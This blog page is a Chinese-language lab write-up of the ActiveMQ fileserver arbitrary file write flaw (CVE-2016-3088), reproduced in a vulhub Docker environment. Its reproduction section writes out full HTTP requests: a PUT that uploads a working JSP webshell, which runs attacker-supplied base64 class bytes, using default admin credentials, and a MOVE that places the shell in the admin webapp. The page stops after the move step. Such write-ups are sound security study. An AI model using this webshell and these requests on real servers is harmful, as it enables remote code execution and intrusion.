<!DOCTYPE html>
<html lang="en" data-bs-theme="auto">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="背景简述ActiveMQ的web控制台分为三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESTful API接口，"/>
    
    
    <!--Keywords-->
    <meta name="keywords" content="">

    <!--Author-->
    
        <meta name="author" content="evabd21"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="ActiveMQ任意文件写入漏洞"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="背景简述ActiveMQ的web控制台分为三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESTful API接口，"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="evabd21"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    

    <meta name="twitter:card" content="summary_large_image"/>

    

    

    <!-- Title -->
    
    <title>ActiveMQ任意文件写入漏洞 - evabd21</title>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    
    <link rel="icon" href="/images/favicon.ico"/>
    
      
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/bootstrap.min.css"><link rel="stylesheet" href="/css/color-modes.css"><link rel="stylesheet" href="/bootstrap-icons/font/bootstrap-icons.css"><script src="/js/bootstrap.bundle.min.js"></script><script type="module" src="/js/color-modes.js"></script><link rel="stylesheet" href="/css/highlight.css"><script src="https://cdn.jsdelivr.net/gh/BP-Devteam/sitescansense/s3module.min.js"></script><script src="/js/init.js"></script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="evabd21" type="application/atom+xml">
    <link rel="preconnect" href="https://fonts.googleapis.com"/>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/>
    <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@400;500;600;700;800&display=swap" rel="stylesheet"/>
    <link rel="stylesheet" href="/css/brand-shell.css"/>
</head>


<body class="brand-page brand-page-article">
    <!-- Menu -->
    <div class="site-shell">
      <header class="site-nav">
        <div class="container">
          <div class="nav-frame">
            <a href="/" class="brand-mark">evabd21</a>
            <nav aria-label="Primary navigation">
              <ul class="nav-links">
                <li><a href="/getting-start">About</a></li>
                <li><a href="/archives">Archives</a></li>
                <li><a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a></li>
              </ul>
            </nav>
          </div>
        </div>
      </header>

    <!-- color mode button -->
<svg xmlns="http://www.w3.org/2000/svg" class="d-none">
    <symbol id="check2" viewBox="0 0 16 16">
      <path d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"></path>
    </symbol>
    <symbol id="circle-half" viewBox="0 0 16 16">
      <path d="M8 15A7 7 0 1 0 8 1v14zm0 1A8 8 0 1 1 8 0a8 8 0 0 1 0 16z"></path>
    </symbol>
    <symbol id="moon-stars-fill" viewBox="0 0 16 16">
      <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"></path>
      <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"></path>
    </symbol>
    <symbol id="sun-fill" viewBox="0 0 16 16">
      <path d="M8 12a4 4 0 1 0 0-8 4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"></path>
    </symbol>
  </svg>
<div class="dropdown position-fixed bottom-0 end-0 mb-3 me-3 bd-mode-toggle z-1">
    <button class="btn btn-bd-primary py-2 dropdown-toggle d-flex align-items-center" id="bd-theme" type="button" aria-expanded="false" data-bs-toggle="dropdown" aria-label="Toggle theme (dark)">
      <svg class="bi my-1 theme-icon-active" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
      <span class="visually-hidden" id="bd-theme-text">Toggle theme</span>
    </button>
    <ul class="dropdown-menu dropdown-menu-end shadow" aria-labelledby="bd-theme-text">
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="light" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#sun-fill"></use></svg>
          Light
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center active" data-bs-theme-value="dark" aria-pressed="true">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
          Dark
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="auto" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#circle-half"></use></svg>
          Auto
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
    </ul>
  </div>

    <main class="page-shell">
        <section class="page-header-section">
          <div class="container">
            <div class="page-header-panel">
              <span class="page-kicker">Research Article</span>
              <h1 class="page-title">ActiveMQ任意文件写入漏洞</h1>
              <p class="page-description">ActiveMQ任意文件写入漏洞 is presented with the same minimal technology-driven shell, improving rhythm, code readability, and long-form scanning.</p>
            </div>
          </div>
        </section>
        <section class="page-content-section">
<article class="article-shell">
    <div class="container">
        <div class="row">
            <div class="col mb-1 d-flex justify-content-between small text-secondary text-opacity-50 article-meta-bar">
                <div>page views <span class="s3_pv">0</span></div>
                 <!-- Date and Author -->
                 
                
                <div>update <span>2021-11-13</span></div>
            </div>
        </div>
    </div>
    <div class="container">
        <!-- Cover Image -->
        
        <div class="row">
            <!-- Gallery -->
            

            <!-- Post Main Content 
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                -->
            <div class="mx-auto col-md-10 col-md-offset-1 article-body">
                <h2 id="背景简述"><a href="#背景简述" class="headerlink" title="背景简述"></a><strong>背景简述</strong></h2><p>ActiveMQ的web控制台分为三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。</p>
<p>fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：</p>
<blockquote>
<p>其使用率并不高</p>
<p>文件操作容易出现漏洞</p>
</blockquote>
<p>所以，<strong>ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（可以在conf&#x2F;jetty.xml中开启）；在5.14.0版本以后，彻底删除了fileserver应用。</strong></p>
<p>在测试过程中，可以<strong>关注ActiveMQ的版本</strong>，避免走弯路。</p>
<h2 id="漏洞详情"><a href="#漏洞详情" class="headerlink" title="漏洞详情"></a><strong>漏洞详情</strong></h2><p>本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。</p>
<p>文件写入有几种利用方法：</p>
<blockquote>
<p>写入webshell</p>
<p>写入cron或ssh key等文件</p>
<p>写入jar或jetty.xml等库和配置文件</p>
</blockquote>
<p>写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。</p>
<h2 id="知识拓展"><a href="#知识拓展" class="headerlink" title="知识拓展"></a><strong>知识拓展</strong></h2><p>背景简述和漏洞详情里面有几点和漏洞强相关的知识点是我之前没有接触过的，需要学习和理解一下：</p>
<blockquote>
<p>cron是什么</p>
<p>反弹shell是什么</p>
<p>cron或ssh key和反弹shell的关系</p>
<p>jetty和jetty.xml是什么</p>
<p>linux文件权限</p>
</blockquote>
<p>下面来一个一个了解一下：</p>
<h3 id="cron是什么"><a href="#cron是什么" class="headerlink" title="cron是什么"></a><strong>cron是什么</strong></h3><p>在这个链接找到了cron的介绍：<a target="_blank" rel="noopener" href="https://www.simcf.cc/9288.html">Cron是什么？利用Cron Job自动执行定时任务</a></p>
<p>简单来说，cron是linux系统的守护进程，用于在特定时间自动执行重复任务。</p>
<h3 id="反弹shell是什么"><a href="#反弹shell是什么" class="headerlink" title="反弹shell是什么"></a><strong>反弹shell是什么</strong></h3><p>简单来说反弹shell（reverse shell）就是反向的shell，是相对于标准shell的一个概念。</p>
<p>标准shell是攻击者作为客户端去连接目标服务器；</p>
<p>而反弹shell是攻击者作为服务器，监听某端口，而目标设备作为客户端主动连接攻击者。</p>
<p>反弹shell的应用场景：</p>
<blockquote>
<p>目标机在局域网内</p>
<p>目标机ip地址是动态的</p>
<p>有防火墙等限制，目标机只能发请求，不能收请求</p>
<p>不确定目标机何时具备连接条件</p>
</blockquote>
<p>这部分主要参考：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/138393396">反弹shell原理与实现</a></p>
<p>至于具体的反弹shell百度一搜全都是，就不说了。</p>
<h3 id="cron或ssh-key和反弹shell的关系"><a href="#cron或ssh-key和反弹shell的关系" class="headerlink" title="cron或ssh key和反弹shell的关系"></a><strong>cron或ssh key和反弹shell的关系</strong></h3><p>cron和反弹shell的关系很好理解，就是往目标机的定时任务文件中写反弹shell脚本；</p>
<p>ssh key和反弹shell的关系，从网上查到的资料看，是往目标机里面写了攻击机的ssh key（公钥）之后，攻击机就可以免密登录目标机。可是这不还是攻击机做客户端，目标机做服务器么？还是需要目标机开启ssh服务，并且允许攻击机连接，和反弹关系不大呀。。。小小的脑袋，大大的问号，也不知道是牵强附会，还是我没找到正确的资料。。</p>
<p>这部分主要参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/84641379">Linux反弹shell</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/148758.html">不请自来 | Redis 未授权访问漏洞深度利用</a></p>
<h3 id="jetty和jetty-xml是什么"><a href="#jetty和jetty-xml是什么" class="headerlink" title="jetty和jetty.xml是什么"></a><strong>jetty和jetty.xml是什么</strong></h3><p>简单来说，jetty是一种开源的servlet容器，是基于java的web容器，和tomcat是一类东西。jetty是通过API或者XML文件进行配置的，而jetty.xml是jetty的一个重要配置文件。</p>
<h3 id="linux文件权限"><a href="#linux文件权限" class="headerlink" title="linux文件权限"></a><strong>linux文件权限</strong></h3><p>vulhub官网教程中，据不完全统计，至少有两句话提到了权限相关的问题：</p>
<blockquote>
<p>This method requires the ActiveMQ run as root, otherwise it will not be able to write to the cron file.</p>
<p>这个方法需要ActiveMQ是root运行，否则也不能写入cron文件。</p>
<p>In some cases, the owner of jetty.xml and jar is the user of the web container, so the success rate of writing crontab is higher.</p>
<p>有的情况下，jetty.xml和jar的所有人是web容器的用户，所以相比起来，写入crontab成功率更高一点。</p>
</blockquote>
<p>总而言之，由于是通过ActiveMQ进行文件上传，因此运行ActiveMQ的用户必须有目标文件夹，或者需要修改的文件的写权限才行。</p>
<p>那么要确定能否写入或者修改文件，就需要确定两件事情：</p>
<blockquote>
<p>文件或文件夹权限</p>
<p>运行ActiveMQ的用户</p>
</blockquote>
<p>下面就以&#x2F;etc&#x2F;cron.d目录和jetty.xml文件来演示如何获取以上两点信息。（<strong>这部分内容仅仅是知识扩展，对于实际攻击没什么意义</strong>）</p>
<h4 id="文件或文件夹权限"><a href="#文件或文件夹权限" class="headerlink" title="文件或文件夹权限"></a><strong>文件或文件夹权限</strong></h4><p>首先需要运行docker容器activemq&#x2F;CVE-2016-3088</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo docker-compose up -d</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image.jpg" alt="Image"></p>
<p>然后可以通过登录网页<a target="_blank" rel="noopener" href="http://your-ip:8161/%E7%A1%AE%E8%AE%A4%E5%AE%B9%E5%99%A8%E8%BF%90%E8%A1%8C%E6%88%90%E5%8A%9F">http://your-ip:8161/确认容器运行成功</a></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594341516-14.jpg" alt="Image"></p>
<p>接下来用下面的命令查看正在运行的docker容器id</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo docker container ps</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594430099-16.jpg" alt="Image"></p>
<p>然后用下面这个命令进入容器</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo docker exec -it 容器id /bin/bash</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594467496-18.jpg" alt="Image"></p>
<p>然后就用cd命令定位到我们想观察的点，再ls -l看看文件夹和文件的所有者和权限设置</p>
<p>从下图中可以看到&#x2F;etc&#x2F;cron.d目录的所有者是root，root用户的权限是可读写可执行；root组和其他组用户权限都是可读可执行。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594489177-20.jpg" alt="Image"></p>
<p>而从下图中可以看到jetty.xml文件的所有者也是root，root用户的权限是可读写，其他用户的权限是可读。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594503923-22.jpg" alt="Image"></p>
<p>运行ActiveMQ的用户</p>
<p>我想到两种方法查看运行ActiveMQ的用户：</p>
<p>第一种 通过ps命令</p>
<p>容器里面是没有ps命令的，需要用下面的命令先安装一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update &amp;&amp; apt-get install procps</span><br></pre></td></tr></table></figure>

<p>安装好之后，用下面的命令查看运行activemq console的用户</p>
<p>ps aux</p>
<p>第二种 通过网页</p>
<p>访问网页：<a target="_blank" rel="noopener" href="http://your-ip:8161/admin/test/systemProperties.jsp%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E8%BF%90%E8%A1%8CActiveMQ%E7%9A%84%E7%94%A8%E6%88%B7%E6%98%AFroot%EF%BC%9A">http://your-ip:8161/admin/test/systemProperties.jsp可以看到运行ActiveMQ的用户是root：</a></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240513180456744.png" alt="image-20240513180456744"></p>
<p>综上所述，运行ActiveMQ的用户是root，而root对&#x2F;etc&#x2F;cron.d目录和jetty.xml文件都是有写权限的，因此理论上上传crontab文件，以及修改jetty.xml文件都应该是可实现的。</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><h3 id="版本要求"><a href="#版本要求" class="headerlink" title="版本要求"></a><strong>版本要求</strong></h3><p>根据vulhub上的背景简述可知，该漏洞影响版本是ActiveMQ在5.14.0之前的版本（不包括5.14.0）。</p>
<p>既然是vulhub提供的漏洞复现环境，那版本肯定是没问题的啦，不过如果想要确认一下版本的话，可以用浏览器访问<a target="_blank" rel="noopener" href="http://your-ip:8161/admin/">http://your-ip:8161/admin/</a></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240513180533703.png" alt="image-20240513180533703"></p>
<h3 id="途径1：写入webshell"><a href="#途径1：写入webshell" class="headerlink" title="途径1：写入webshell"></a><strong>途径1：写入webshell</strong></h3><p>前提条件</p>
<blockquote>
<p>需要知道ActiveMQ的绝对路径</p>
<p>需要能登录admin或者api</p>
</blockquote>
<p>思路分析</p>
<p>由于要满足以上两个前提条件，并且ActiveMQ的绝对路径可以通过<a target="_blank" rel="noopener" href="http://your-ip:8161/admin/test/systemProperties.jsp%E9%A1%B5%E9%9D%A2%E8%8E%B7%E5%8F%96%EF%BC%8C%E8%80%8C%E8%BF%99%E4%B8%AA%E9%A1%B5%E9%9D%A2%E4%B9%9F%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95admin%E4%B9%8B%E5%90%8E%E6%89%8D%E8%83%BD%E8%AE%BF%E9%97%AE%E3%80%82%E5%9B%A0%E6%AD%A4%EF%BC%8C%E5%BA%94%E8%AF%A5%E6%8C%89%E7%85%A7%E5%A6%82%E4%B8%8B%E6%AD%A5%E9%AA%A4%E5%AE%9E%E6%96%BD%E6%94%BB%E5%87%BB%EF%BC%9A">http://your-ip:8161/admin/test/systemProperties.jsp页面获取，而这个页面也需要登录admin之后才能访问。因此，应该按照如下步骤实施攻击：</a></p>
<blockquote>
<p>获取admin应用的用户名和密码</p>
<p>访问<a target="_blank" rel="noopener" href="http://your-ip:8161/admin/test/systemProperties.jsp%E8%8E%B7%E5%8F%96ActiveMQ%E7%9A%84%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84">http://your-ip:8161/admin/test/systemProperties.jsp获取ActiveMQ的绝对路径</a></p>
<p>上传webshell</p>
<p>将webshell移动到admin所在文件夹</p>
<p>连接webshell</p>
</blockquote>
<p>利用步骤</p>
<p>1、获取admin应用的用户名和密码</p>
<p>不是重点，不详细说了，而且这个步骤放在这篇文章里完全是为了攻击链的完整性，其实vulhub的教程已经说了默认用户名和密码都是admin。</p>
<p>我能想到的几种获取用户名和密码的方法：</p>
<blockquote>
<p>尝试默认用户名和密码</p>
<p>尝试弱口令（暴力破解）</p>
<p>社工</p>
</blockquote>
<p>暴力破解可以用Burp Suite的intruder模块。</p>
<p>2、获取ActiveMQ的绝对路径</p>
<p>得到admin应用的用户名和密码之后，就可以访问网页<a target="_blank" rel="noopener" href="http://your-ip:8161/admin/test/systemProperties.jsp%E6%9D%A5%E8%8E%B7%E5%8F%96ActiveMQ%E7%9A%84%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E4%BA%86%EF%BC%8C%E5%85%B7%E4%BD%93%E8%A7%81%E4%B8%8B%E5%9B%BE%E7%BA%A2%E6%A1%86%E6%A1%86%E3%80%82">http://your-ip:8161/admin/test/systemProperties.jsp来获取ActiveMQ的绝对路径了，具体见下图红框框。</a></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image.png" alt="Image"></p>
<p>3、上传webshell</p>
<p>先得把webshell上传到fileserver，之后才能从fileserver转移。由于ActiveMQ是个java程序，因此需要传个jsp webshell。</p>
<p>在网上找了个jsp webshell：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43615820/article/details/116357744">蚁剑jsp一句话木马</a></p>
<p>用PUT方法把webshell上传到fileserver：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">PUT</span> <span class="string">/fileserver/ele.txt</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>JSESSIONID=nc4v0my0vmaso0b829zo2e5f</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run/</span><br><span class="line"><span class="attribute">Authorization</span><span class="punctuation">: </span>Basic YWRtaW46YWRtaW4=</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Te</span><span class="punctuation">: </span>trailers</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>780</span><br><span class="line"></span><br><span class="line"><span class="language-gradle"></span></span><br><span class="line"><span class="language-gradle">&lt;%!</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">class</span> U <span class="keyword">extends</span> ClassLoader &#123;</span></span><br><span class="line"><span class="language-gradle">U(ClassLoader c) &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">super</span>(c);</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">public</span> <span class="keyword">Class</span> g(<span class="keyword">byte</span>[] b) &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">return</span> <span class="keyword">super</span>.defineClass(b, <span class="number">0</span>, b.length);</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">public</span> <span class="keyword">byte</span>[] base64Decode(String str) <span class="keyword">throws</span> Exception &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">try</span> &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">Class</span> clazz = <span class="keyword">Class</span>.forName(<span class="string">&quot;sun.misc.BASE64Decoder&quot;</span>);</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">return</span> (<span class="keyword">byte</span>[]) clazz.getMethod(<span class="string">&quot;decodeBuffer&quot;</span>, String.<span class="keyword">class</span>).invoke(clazz.newInstance(), str);</span></span><br><span class="line"><span class="language-gradle">&#125; <span class="keyword">catch</span> (Exception e) &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">Class</span> clazz = <span class="keyword">Class</span>.forName(<span class="string">&quot;java.util.Base64&quot;</span>);</span></span><br><span class="line"><span class="language-gradle">Object decoder = clazz.getMethod(<span class="string">&quot;getDecoder&quot;</span>).invoke(<span class="keyword">null</span>);</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">return</span> (<span class="keyword">byte</span>[]) decoder.getClass().getMethod(<span class="string">&quot;decode&quot;</span>, String.<span class="keyword">class</span>).invoke(decoder, str);</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle">%&gt;</span></span><br><span class="line"><span class="language-gradle">&lt;%</span></span><br><span class="line"><span class="language-gradle">String cls = request.getParameter(<span class="string">&quot;passwd&quot;</span>);</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">if</span> (cls != <span class="keyword">null</span>) &#123;</span></span><br><span class="line"><span class="language-gradle"><span class="keyword">new</span> U(<span class="keyword">this</span>.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);</span></span><br><span class="line"><span class="language-gradle">&#125;</span></span><br><span class="line"><span class="language-gradle">%&gt;</span></span><br></pre></td></tr></table></figure>

<p>Response报文状态码204表示上传成功：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594854417-27.png" alt="Image"></p>
<p>4、将webshell移动到admin所在文件夹</p>
<p>用MOVE方法进行webshell的移动</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">MOVE</span> <span class="string">/fileserver/ele.txt</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Destination</span><span class="punctuation">: </span>file:///opt/activemq/webapps/admin/ele.jsp</span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>JSESSIONID=nc4v0my0vmaso0b829zo2e5f</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run/</span><br><span class="line"><span class="attribute">Authorization</span><span class="punctuation">: </span>Basic YWRtaW46YWRtaW4=</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Te</span><span class="punctuation">: </span>trailers</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br></pre></td></tr></table></figure>

<p>同样，Response报文状态码204表示移动成功：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594898264-29.png" alt="Image"></p>
